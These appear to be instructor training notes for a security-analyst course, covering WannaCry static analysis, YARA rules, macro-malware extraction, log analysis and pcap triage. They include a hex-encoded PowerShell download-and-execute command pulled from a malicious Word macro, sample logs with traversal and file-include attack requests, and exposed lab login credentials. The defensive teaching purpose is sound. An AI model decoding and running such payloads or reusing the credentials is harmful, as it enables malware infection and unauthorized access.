Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #############
- # CySA 2021 #
- #############
- ################################################
- ############################## # Day 1: Linux Fundamentals & Mawlare Analysis # ##############################
- ################################################
- Task 1: Linux Basics
- --------------------
- - Here is a good tutorial that you should complete before doing the labs below:
- http://linuxsurvival.com/linux-tutorial-introduction/
- Slides we will cover
- --------------------
- - Here is a good set of slides for getting started with Linux:
- http://www.slideshare.net/olafusimichael/linux-training-24086319
- Task 2: More Linux Basics
- -------------------------
- site: https://app.shellngn.com/
- user: joseph.mccray@gmail.com
- pass: P@ssw0rd123!@#123
- NOTE: Ask me for the correct password
- ###########################
- ############################## # Day 1: Malware Analysis # ##############################
- ###########################
- ################
- # The Scenario #
- ################
- You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts). The fastest thing you can do is perform static analysis.
- ####################
- # Malware Analysis #
- ####################
- - After logging please open a terminal window and type the following commands:
- ---------------------------Type This-----------------------------------
- cd ~/students/
- mkdir yourname
- cd yourname
- mkdir malware_analysis
- cd malware_analysis
- -----------------------------------------------------------------------
- - This is actual Malware (remember to run it in a VM - the password to extract it is 'infected':
- ---------------------------Type This-----------------------------------
- cd ~/students/yourname/malware_analysis
- cp ~/static_analysis/wannacry.exe .
- file wannacry.exe
- cp wannacry.exe malware.pdf
- file malware.pdf
- cp malware.pdf malware.exe
- hexdump -n 2 -C malware.exe
- -----------------------------------------------------------------------
- ***What is '4d 5a' or 'MZ'***
- Open up a web browser and go to this reference link below. See if you can figure out what '4d 5a' or 'MZ'
- Reference:
- http://www.garykessler.net/library/file_sigs.html
- ---------------------------Type This-----------------------------------
- cd ~/students/yourname/malware_analysis
- objdump -x wannacry.exe | less
- q
- strings wannacry.exe
- strings wannacry.exe | grep -i dll
- strings wannacry.exe | grep -i library
- strings wannacry.exe | grep -i reg
- strings wannacry.exe | grep -i hkey
- strings wannacry.exe | grep -i hku
- strings wannacry.exe | grep -i crypto
- ---------------------------------------------------
- ################################
- # Good references for WannaCry #
- ################################
- References:
- https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168
- https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
- https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
- ####################################
- # Tired of GREP - let's try Python #
- ####################################
- Decided to make my own script for this kind of stuff in the future. I
- Reference1:
- https://infosecaddicts-files.s3.amazonaws.com/analyse_malware.py
- This is a really good script for the basics of static analysis
- Reference:
- https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
- This is really good for showing some good signatures to add to the Python script
- Here is my own script using the signatures (started this yesterday, but still needs work):
- https://pastebin.com/guxzCBmP
- ---------------------------Type This-----------------------------------
- wget https://pastebin.com/raw/guxzCBmP
- mv guxzCBmP am.py
- nano am.py
- python am.py wannacry.exe
- -----------------------------------------------------------------------
- ##############
- # Yara Ninja #
- ##############
- Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
- Quick Google search for "wannacry ransomeware analysis"
- Reference
- https://www.mcafee.com/blogs/other-blogs/executive-perspectives/analysis-wannacry-ransomware-outbreak/
- - Yara Rule -
- Strings:
- $s1 = “Ooops, your files have been encrypted!” wide ascii nocase
- $s2 = “Wanna Decryptor” wide ascii nocase
- $s3 = “.wcry” wide ascii nocase
- $s4 = “WANNACRY” wide ascii nocase
- $s5 = “WANACRY!” wide ascii nocase
- $s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
- Ok, let's look for the individual strings
- ---------------------------Type This-----------------------------------
- cd ~/students/yourname/malware_analysis
- strings wannacry.exe | grep -i ooops
- strings wannacry.exe | grep -i wanna
- strings wannacry.exe | grep -i wcry
- strings wannacry.exe | grep -i wannacry
- strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
- -----------------------------------------------------------------------
- Let's see if we can get yara working.
- ---------------------------Type This-----------------------------------
- cd ~/students/yourname/malware_analysis
- mkdir quick_yara
- cd quick_yara
- cp ~/static_analysis/wannacry.exe .
- -----------------------------------------------------------------------
- ---------------------------Type This-----------------------------------
- nano wannacry_1.yar
- ---------------------------Paste This-----------------------------------
- rule wannacry_1 : ransom
- {
- meta:
- author = "Joshua Cannell"
- description = "WannaCry Ransomware strings"
- weight = 100
- date = "2017-05-12"
- strings:
- $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
- $s2 = "Wanna Decryptor" wide ascii nocase
- $s3 = ".wcry" wide ascii nocase
- $s4 = "WANNACRY" wide ascii nocase
- $s5 = "WANACRY!" wide ascii nocase
- $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
- condition:
- any of them
- }
- ----------------------------------------------------------------------------
- ---------------------------Type This-----------------------------------
- yara wannacry_1.yar wannacry.exe
- -----------------------------------------------------------------------
- ---------------------------Type This-----------------------------------
- nano wannacry_2.yar
- ---------------------------Paste This-----------------------------------
- rule wannacry_2{
- meta:
- author = "Harold Ogden"
- description = "WannaCry Ransomware Strings"
- date = "2017-05-12"
- weight = 100
- strings:
- $string1 = "msg/m_bulgarian.wnry"
- $string2 = "msg/m_chinese (simplified).wnry"
- $string3 = "msg/m_chinese (traditional).wnry"
- $string4 = "msg/m_croatian.wnry"
- $string5 = "msg/m_czech.wnry"
- $string6 = "msg/m_danish.wnry"
- $string7 = "msg/m_dutch.wnry"
- $string8 = "msg/m_english.wnry"
- $string9 = "msg/m_filipino.wnry"
- $string10 = "msg/m_finnish.wnry"
- $string11 = "msg/m_french.wnry"
- $string12 = "msg/m_german.wnry"
- $string13 = "msg/m_greek.wnry"
- $string14 = "msg/m_indonesian.wnry"
- $string15 = "msg/m_italian.wnry"
- $string16 = "msg/m_japanese.wnry"
- $string17 = "msg/m_korean.wnry"
- $string18 = "msg/m_latvian.wnry"
- $string19 = "msg/m_norwegian.wnry"
- $string20 = "msg/m_polish.wnry"
- $string21 = "msg/m_portuguese.wnry"
- $string22 = "msg/m_romanian.wnry"
- $string23 = "msg/m_russian.wnry"
- $string24 = "msg/m_slovak.wnry"
- $string25 = "msg/m_spanish.wnry"
- $string26 = "msg/m_swedish.wnry"
- $string27 = "msg/m_turkish.wnry"
- $string28 = "msg/m_vietnamese.wnry"
- condition:
- any of ($string*)
- }
- ----------------------------------------------------------------------------
- ---------------------------Type This-----------------------------------
- yara wannacry_2.yar wannacry.exe
- -----------------------------------------------------------------------
- ---------------------------Type This-----------------------------------
- cd ~/students/yourname/malware_analysis/quick_yara
- git clone https://github.com/Yara-Rules/rules.git
- cd rules/
- cd malware/
- rm -rf RAT_PoetRATPython.yar
- cd ..
- ./index_gen.sh
- ls
- cd malware/
- ls | grep -i ransom
- ls | grep -i rat
- ls | grep -i toolkit
- ls | grep -i apt
- cd ..
- cd capabilities/
- ls
- cat capabilities.yar
- cd ..
- cd cve_rules/
- ls
- cd ..
- ./index_gen.sh
- cd ..
- yara -w rules/index.yar wannacry.exe
- ----------------------------------------------------------------------
- References:
- https://www.slideshare.net/JohnLaycock1/yet-another-yara-allocution-yaya
- https://www.slideshare.net/KasperskyLabGlobal/upping-the-apt-hunting-game-learn-the-best-yara-practices-from-kaspersky
- #####################################################
- # Analyzing Macro Embedded Malware #
- #####################################################
- ---------------------------Type This-----------------------------------
- cd ~/students/yourname/malware_analysis
- mkdir macro_docs
- cd macro_docs
- cp -R ~/static_analysis/* .
- python oledump.py 064016.doc
- python oledump.py 064016.doc -s A4 -v
- -----------------------------------------------------------------------
- - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
- - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
- ---------------------------Type This-----------------------------------
- python oledump.py 064016.doc -s A5 -v
- -----------------------------------------------------------------------
- - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
- ---------------------------Type This-----------------------------------
- python oledump.py 064016.doc -s A3 -v
- - Look for "GVhkjbjv" and you should see:
- 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
- - Take that long blob that starts with 636D and finishes with 653B and paste it in:
- http://www.rapidtables.com/convert/number/hex-to-ascii.htm
- -----------------------------------------------------------------------
- #######################
- # Log Analysis Basics #
- #######################
- Step 1: Download the log file
- -----------------------------
- Browse to this link below, and save the page as a text file on your desktop.
- https://pastebin.com/raw/vhAh4XBQ
- Step 2: Reduce the noise (Find/Replace All)
- -------------------------------------------
- Now open the log file in Notepad and perform basic find/replace actions. For each of snippets of text below do a replace all - replacing each one of them with nothing.
- <189>Nov 11 2006
- %Customer_PIX: Attacker_IP Accessed URL Target_IP:
- -
- Step 3: Group LIKE data
- -----------------------
- At the end of each one of these lines press ENTER 4 times.
- 15:59:32: /icons/image2.gif
- 16:01:53: /oz/attachments
- 16:03:53: /oz/admin/control.php? tpl=Please+Select+a+Template+to+Edit+.+.+.&t=templates&restore_tpl=Restore+Templates
- 16:10:26: /oz/common/logout.php?database=http://cgi.cs.kent.edu/ ~pwang/php/store/images/14.txt%00
- 16:27:20: /oz/common/login.php?default_language=../../../../../../../tmp/tmp&cmd=ls%20-la%20../../wordpress
- 16:28:27: /wordpress/test.php?=PHPE9568F35-D428-11d2-A769- 00AA001ACF42
- Step 4: Rename fields
- ----------------------
- Find "../../../../../../../" (without the quotes) and replace it with " --- directory traversal attack --- "
- Find "%20" (without the quotes) and replace it with " " (meaning a space also without the quotes)
- Step 4: Repeat
- --------------
- Keep doing this process over and over and over
- ##############################################
- # Log Analysis with Linux command-line tools #
- ##############################################
- - The following command line executables are found in the Mac as well as most Linux Distributions.
- cat – prints the content of a file in the terminal window
- grep – searches and filters based on patterns
- awk – can sort each row into fields and display only what is needed
- sed – performs find and replace functions
- sort – arranges output in an order
- uniq – compares adjacent lines and can report, filter or provide a count of duplicates
- ##############
- # Cisco Logs #
- ##############
- ---------------------------Type This-----------------------------------
- cd ~/students/yourname/
- mkdir log_analysis
- cd log_analysis
- wget http://45.63.104.73/cisco.log
- -----------------------------------------------------------------------
- AWK Basics
- ----------
- - To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
- ---------------------------Type This-----------------------------------
- cat cisco.log | awk '{print $5}' | tail -n 4
- -----------------------------------------------------------------------
- - Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5”, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c” to count the like entries, then using “sort -rn” to sort it in reverse order.
- ---------------------------Type This-----------------------------------
- cat cisco.log | awk '{print $5}'| sort | uniq -c | sort -rn
- -----------------------------------------------------------------------
- - While that’s sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren’t conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This insures that we are at least looking at lines of text that contain “facility-level-mnemonic”.
- ---------------------------Type This-----------------------------------
- cat cisco.log | grep %[a-zA-Z]*-[0-9]-[a-zA-Z]* | awk '{print $5}' | sort | uniq -c | sort -rn
- -----------------------------------------------------------------------
- - Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
- ---------------------------Type This-----------------------------------
- cat cisco.log | grep %LINEPROTO-5-UPDOWN:
- cat cisco.log | grep %LINEPROTO-5-UPDOWN:| awk '{print $10}' | sort | uniq -c | sort -rn
- cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10}' | sort | uniq -c | sort -rn
- cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10 " changed to " $14}' | sort | uniq -c | sort -rn
- -----------------------------------------------------------------------
- ###############
- # Apache Logs #
- ###############
- Reference:
- http://www.the-art-of-web.com/system/logs/
- ---------------------------Type This-----------------------------------
- cd ~/students/yourname/log_analysis
- cp /home/ocodco/students/j0e/log_analysis/access_log .
- -----------------------------------------------------------------------
- You want to list all user agents ordered by the number of times they appear (descending order):
- ---------------------------Type This-----------------------------------
- awk -F\" '{print $6}' access_log | sort | uniq -c | sort -rn
- -----------------------------------------------------------------------
- Using the default separator which is any white-space (spaces or tabs) we get the following:
- NOTE: Do not run the part after the "#" symbol - that is just for explanation
- ---------------------------Type This-----------------------------------
- awk '{print $1}' access_log # ip address (%h)
- awk '{print $2}' access_log # RFC 1413 identity (%l)
- awk '{print $3}' access_log # userid (%u)
- awk '{print $4,5}' access_log # date/time (%t)
- awk '{print $9}' access_log # status code (%>s)
- awk '{print $10}' access_log # size (%b)
- -----------------------------------------------------------------------
- You might notice that we've missed out some items. To get to them we need to set the delimiter to the " character which changes the way the lines are 'exploded' and allows the following:
- ---------------------------Type This-----------------------------------
- awk -F\" '{print $2}' access_log # request line (%r)
- awk -F\" '{print $4}' access_log # referer
- awk -F\" '{print $6}' access_log # user agent
- -----------------------------------------------------------------------
- Reference:
- https://blog.nexcess.net/2011/01/21/one-liners-for-apache-log-files/
- # top 20 URLs from the last 5000 hits
- ---------------------------Type This-----------------------------------
- tail -5000 ./access_log | awk '{print $7}' | sort | uniq -c | sort -rn | head -20
- tail -5000 ./access_log | awk '{freq[$7]++} END {for (x in freq) {print freq[x], x}}' | sort -rn | head -20
- -----------------------------------------------------------------------
- # top 20 URLS excluding POST data from the last 5000 hits
- ---------------------------Type This-----------------------------------
- tail -5000 ./access_log | awk -F"[ ?]" '{print $7}' | sort | uniq -c | sort -rn | head -20
- tail -5000 ./access_log | awk -F"[ ?]" '{freq[$7]++} END {for (x in freq) {print freq[x], x}}' | sort -rn | head -20
- -----------------------------------------------------------------------
- # top 20 IPs from the last 5000 hits
- ---------------------------Type This-----------------------------------
- tail -5000 ./access_log | awk '{print $1}' | sort | uniq -c | sort -rn | head -20
- tail -5000 ./access_log | awk '{freq[$1]++} END {for (x in freq) {print freq[x], x}}' | sort -rn | head -20
- -----------------------------------------------------------------------
- # top 20 URLs requested from a certain ip from the last 5000 hits
- ---------------------------Type This-----------------------------------
- IP=1.2.3.4; tail -5000 ./access_log | grep $IP | awk '{print $7}' | sort | uniq -c | sort -rn | head -20
- IP=1.2.3.4; tail -5000 ./access_log | awk -v ip=$IP ' $1 ~ ip {freq[$7]++} END {for (x in freq) {print freq[x], x}}' | sort -rn | head -20
- -----------------------------------------------------------------------
- # top 20 URLS requested from a certain ip excluding, excluding POST data, from the last 5000 hits
- ---------------------------Type This-----------------------------------
- IP=1.2.3.4; tail -5000 ./access_log | fgrep $IP | awk -F "[ ?]" '{print $7}' | sort | uniq -c | sort -rn | head -20
- IP=1.2.3.4; tail -5000 ./access_log | awk -F"[ ?]" -v ip=$IP ' $1 ~ ip {freq[$7]++} END {for (x in freq) {print freq[x], x}}' | sort -rn | head -20
- -----------------------------------------------------------------------
- # top 20 referrers from the last 5000 hits
- ---------------------------Type This-----------------------------------
- tail -5000 ./access_log | awk '{print $11}' | tr -d '"' | sort | uniq -c | sort -rn | head -20
- tail -5000 ./access_log | awk '{freq[$11]++} END {for (x in freq) {print freq[x], x}}' | tr -d '"' | sort -rn | head -20
- -----------------------------------------------------------------------
- # top 20 user agents from the last 5000 hits
- ---------------------------Type This-----------------------------------
- tail -5000 ./access_log | cut -d\ -f12- | sort | uniq -c | sort -rn | head -20
- -----------------------------------------------------------------------
- # sum of data (in MB) transferred in the last 5000 hits
- ---------------------------Type This-----------------------------------
- tail -5000 ./access_log | awk '{sum+=$10} END {print sum/1048576}'
- -----------------------------------------------------------------------
- #################################
- # Using Python for log analysis #
- #################################
- python
- >>>
- ###########################################
- # Python Basics Lesson 1: Simple Printing #
- ###########################################
- >>> print 1
- >>> print hello
- >>> print "hello"
- >>> print "Today we are learning Python."
- ###################################################
- # Python Basics Lesson 2: Simple Numbers and Math #
- ###################################################
- >>> 2+2
- >>> 6-3
- >>> 18/7
- >>> 18.0/7
- >>> 18.0/7.0
- >>> 18/7
- >>> 9%4
- >>> 8%4
- >>> 8.75%.5
- >>> 6.*7
- >>> 6*6*6
- >>> 6**3
- >>> 5**12
- >>> -5**4
- #####################################
- # Python Basics Lesson 3: Variables #
- #####################################
- >>> x=18
- >>> x+15
- >>> x**3
- >>> y=54
- >>> x+y
- >>> age=input("Enter number here: ")
- 43
- >>> age+32
- >>> age**3
- >>> fname = raw_input("Enter your first name: ")
- >>> lname = raw_input("Enter your first name: ")
- >>> fname = raw_input("Enter your name: ")
- Enter your name: Joe
- >>> lname = raw_input("Enter your name: ")
- Enter your name: McCray
- >>> print fname
- Joe
- >>> print lname
- McCray
- >>> print fname lname
- >>> print fname+lname
- JoeMcCray
- NOTE:
- Use "input() for integers and expressions, and use raw_input() when you are dealing with strings.
- #################################################
- # Python Basics Lesson 4: Modules and Functions #
- #################################################
- >>> 5**4
- >>> pow(5,4)
- >>> abs(-18)
- >>> abs(5)
- >>> floor(18.7)
- >>> import math
- >>> math.floor(18.7)
- >>> math.sqrt(81)
- >>> joe = math.sqrt
- >>> joe(9)
- >>> joe=math.floor
- >>> joe(19.8)
- ###################################
- # Python Basics Lesson 5: Strings #
- ###################################
- >>> "XSS"
- >>> 'SQLi'
- >>> "Joe's a python lover"
- >>> 'Joe\'s a python lover'
- >>> "Joe said \"InfoSec is fun\" to me"
- >>> a = "Joe"
- >>> b = "McCray"
- >>> a, b
- >>> a+b
- ########################################
- # Python Basics Lesson 6: More Strings #
- ########################################
- >>> num = 10
- >>> num + 2
- >>> "The number of open ports found on this system is " + num
- >>> num = str(18)
- >>> "There are " + num + " vulnerabilities found in this environment."
- >>> num2 = 46
- >>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2`
- NOTE:
- Use "input() for integers and expressions, and use raw_input() when you are dealing with strings.
- ###############################################
- # Python Basics Lesson 7: Sequences and Lists #
- ###############################################
- >>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
- >>> attacks
- ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
- >>> attacks[3]
- 'SQL Injection'
- >>> attacks[-2]
- 'Cross-Site Scripting'
- ########################################
- # Python Basics Level 8: If Statement #
- ########################################
- >>> attack="SQLI"
- >>> if attack=="SQLI":
- print 'The attacker is using SQLI'
- >>> attack="XSS"
- >>> if attack=="SQLI":
- print 'The attacker is using SQLI'
- >>> exit()
- #############################
- # Reference Videos To Watch #
- #############################
- Here is your first set of youtube videos that I'd like for you to watch:
- https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10)
- #####################################
- # Lesson 9: Intro to Log Analysis #
- #####################################
- Login to your StrategicSec Ubuntu machine. You can download the VM from the following link:
- https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip
- username: strategicsec
- password: strategicsec
- Then execute the following commands:
- ---------------------------------------------------------------------------------------------------------
- wget https://s3.amazonaws.com/SecureNinja/Python/access_log
- cat access_log | grep 141.101.80.188
- cat access_log | grep 141.101.80.187
- cat access_log | grep 108.162.216.204
- cat access_log | grep 173.245.53.160
- ---------------------------------------------------------
- Google the following terms:
- - Python read file
- - Python read line
- - Python read from file
- ########################################################
- # Lesson 10: Use Python to read in a file line by line #
- ########################################################
- Reference:
- http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/
- Let's have some fun.....
- >>> f = open('access_log', "r")
- >>> lines = f.readlines()
- >>> print lines
- >>> lines[0]
- >>> lines[10]
- >>> lines[50]
- >>> lines[1000]
- >>> lines[5000]
- >>> lines[10000]
- >>> print len(lines)
- ---------------------------------------------------------
- vi logread1.py
- ## Open the file with read only permit
- f = open('access_log', "r")
- ## use readlines to read all lines in the file
- ## The variable "lines" is a list containing all lines
- lines = f.readlines()
- print lines
- ## close the file after reading the lines.
- f.close()
- ---------------------------------------------------------
- Google the following:
- - python difference between readlines and readline
- - python readlines and readline
- #################################
- # Lesson 11: A quick challenge #
- #################################
- Can you write an if/then statement that looks for this IP and print "Found it"?
- 141.101.81.187
- ---------------------------------------------------------
- Hint 1: Use Python to look for a value in a list
- Reference:
- http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html
- ---------------------------------------------------------
- Hint 2: Use Python to prompt for user input
- Reference:
- http://www.cyberciti.biz/faq/python-raw_input-examples/
- ---------------------------------------------------------
- Hint 3: Use Python to search for a string in a list
- Reference:
- http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string
- Here is my solution:
- -------------------
- $ python
- >>> f = open('access_log', "r")
- >>> lines = f.readlines()
- >>> ip = '141.101.81.187'
- >>> for string in lines:
- ... if ip in string:
- ... print(string)
- Here is one student's solution - can you please explain each line of this code to me?
- -------------------------------------------------------------------------------------
- #!/usr/bin/python
- f = open('access_log')
- strUsrinput = raw_input("Enter IP Address: ")
- for line in iter(f):
- ip = line.split(" - ")[0]
- if ip == strUsrinput:
- print line
- f.close()
- -------------------------------
- Working with another student after class we came up with another solution:
- #!/usr/bin/env python
- # This line opens the log file
- f=open('access_log',"r")
- # This line takes each line in the log file and stores it as an element in the list
- lines = f.readlines()
- # This lines stores the IP that the user types as a var called userinput
- userinput = raw_input("Enter the IP you want to search for: ")
- # This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
- for ip in lines:
- if ip.find(userinput) != -1:
- print ip
- #########################################
- # Security Operations Center Job Roles #
- # Intrusion Analysis Level 1 #
- #########################################
- Required Technical Skills: Comfortable with basic Linux/Windows (MCSA/Linux+)
- Comfortable with basic network (Network+)
- Comfortable with security fundamentals (Security+)
- Job Task: Process security events, follow incident response triage playbook
- #########################################
- # Security Operations Center Job Roles #
- # Intrusion Analysis Level 2 #
- #########################################
- Required Technical Skills: Comfortable with basic Linux/Windows system administration
- Comfortable with basic network administration
- Comfortable with basic programming
- Comfortable researching IT security issues
- Job Task: Perform detailed malware analysis, assist with development of the incident response triage playbook
- Sample Playbook: https://infosecaddicts-files.s3.amazonaws.com/IR-Program-and-Playbooks.zip
- #########################################
- # Security Operations Center Job Roles #
- # Intrusion Analysis Level 3 #
- #########################################
- Required Technical Skills: Strong statistical analysis background
- Strong programming background (C, C++, Java, Assembly, scripting languages)
- Advanced system/network administration background
- Comfortable researching IT security issues
- Job Task: Perform detailed malware analysis
- Perform detailed statistical analysis
- Assist with development of the incident response triage playbook
- #################################################
- # Good references for learning Malware Analysis #
- #################################################
- References:
- https://www.slideshare.net/SamBowne/cnit-126-ch-0-malware-analysis-primer-1-basic-static-techniques
- https://www.slideshare.net/grecsl/malware-analysis-101-n00b-to-ninja-in-60-minutes-at-bsideslv-on-august-5-2014
- https://www.slideshare.net/Bletchley131/intro-to-static-analysis
- #####################################
- ############################## # Day 2: Threat Hunting on the wire # ##############################
- #####################################
- - After logging please open a terminal window and type the following commands:
- ---------------------------Type This-----------------------------------
- cd ~/students/yourname/
- mkdir pcap_analysis
- cd ~/students/yourname/pcap_analysis
- -----------------------------------------------------------------------
- ##################################################################
- # Analyzing a PCAP Prads #
- # Note: run as regular user #
- ##################################################################
- ---------------------------Type this as a regular user----------------------------------
- cd ~/students/yourname/pcap_analysis/
- mkdir prads/
- cd prads/
- cp -R /home/ocodco/pcap_analysis/chaos_reader/*pcap .
- prads -r suspicious-time.pcap -l prads-asset.log
- cat prads-asset.log | less
- q
- cat prads-asset.log | grep SYN | grep -iE 'windows|linux'
- cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'
- cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'
- -----------------------------------------------------------------------
- ##################################
- # PCAP Analysis with ChaosReader #
- # Note: run as regular user #
- ##################################
- ---------------------------Type this as a regular user----------------------------------
- cd ~/students/yourname/pcap_analysis/
- mkdir chaos_reader/
- cd chaos_reader/
- wget http://45.63.104.73/suspicious-time.pcap
- wget http://45.63.104.73/chaosreader.pl
- perl chaosreader.pl suspicious-time.pcap
- cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
- cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
- for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
- for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u | awk '{print $5}' > url.lst
- wget https://raw.githubusercontent.com/Open-Sec/forensics-scripts/master/check-urls-virustotal.py
- python check-urls-virustotal.py url.lst
- ------------------------------------------------------------------------
- #############################
- # PCAP Analysis with tshark #
- # Note: run as regular user #
- #############################
- ---------------------------Type this as a regular user---------------------------------
- cd ~/students/yourname/pcap_analysis/
- mkdir tshark/
- cd tshark/
- cp -R /home/ocodco/pcap_analysis/chaos_reader/*pcap .
- tshark -i ens3 -r suspicious-time.pcap -qz io,phs
- tshark -r suspicious-time.pcap -qz ip_hosts,tree
- tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
- tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
- tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
- whois rapidshare.com.eyu32.ru
- whois sploitme.com.cn
- tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
- tshark -r suspicious-time.pcap -qz http_req,tree
- tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
- tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
- ------------------------------------------------------------------------
- ###############################
- # Extracting files from PCAPs #
- # Note: run as regular user #
- ###############################
- ---------------------------Type this as a regular user---------------------------------
- cd ~/students/yourname/pcap_analysis/
- mkdir extract_files
- cd extract_files
- wget http://45.63.104.73/suspicious-time.pcap
- foremost -v -i suspicious-time.pcap
- cd output
- ls
- cat audit.txt
- cd exe
- wget https://raw.githubusercontent.com/GREEKYnikhilsharma/Xen0ph0n-VirusTotal_API_Tool-Python3/master/vtlite.py
- ---------------------------------------------------------------------------------------
- ******* NOTE: You will need to put your virustotal API key in vtlite.py *******
- * Create an account in virustotal > login > click on your profile > API key > copy API key > in terminal do nano vtlite.py >
- * Paste the API key in where it says > profit
- ********************************************************************************
- ---------------------------Type this as a regular user---------------------------------
- for f in *.exe; do python3 vtlite.py -s $f; sleep 20; done
- ---------------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement